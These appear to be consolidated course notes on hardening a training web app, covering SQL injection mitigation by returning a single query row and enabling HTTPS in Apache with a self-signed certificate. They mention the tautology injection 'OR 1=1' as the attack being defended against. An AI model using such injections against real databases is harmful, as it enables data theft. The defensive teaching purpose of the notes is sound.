**W4P injections 1 โ€” mitigation.** The page acts as an oracle and leaks lots of information; its structure changes on a crash, and it prints all query rows even though logically it should receive one. Normalize the output by splitting the PHP tag so the table is always created (regardless of a crash), and print only one row using `mysql_fetch_assoc($result)` (returns the first entry). Besides hiding information, this also protects against tautological injections (`OR 1=1`): even if the first clause becomes true for every row, only one result is returned.

**W4P virtual host โ€” HTTPS hardening.** The app sends traffic in cleartext, so an attacker can read it. A **virtual host** is a web-server configuration served by a physical host, which can serve several as long as their IDs differ. The default virtual host serves unencrypted HTTP; in Apache 2 the virtual-host configs live under `/etc/apache2`, where a second one named `default-ssl` exists. SSL/TLS encryption requires a PEM certificate (base64, ASN.1 formatted) binding a public key to a domain name, a private key in the same format, and a CA signature (or automatic renewal via **Let's Encrypt**). For the course a **self-signed certificate** is used โ€” fine for debugging, **NOT acceptable in the real world** โ€” and a browser that allows proceeding under risk (e.g. **epiphany**). Load the security modules with `a2enmod `, switch the site's virtual host to `default-ssl` (HTTPS), restart Apache, and forward the new VM port. Monitoring with Wireshark afterwards shows no more HTTP traffic; QUIC/SSL carries application data whose content is not interpretable (though traffic analysis can still reveal which domain/page is being requested).

---

*Notes consolidated from coursework; some material is also explained step by step in the course slides.*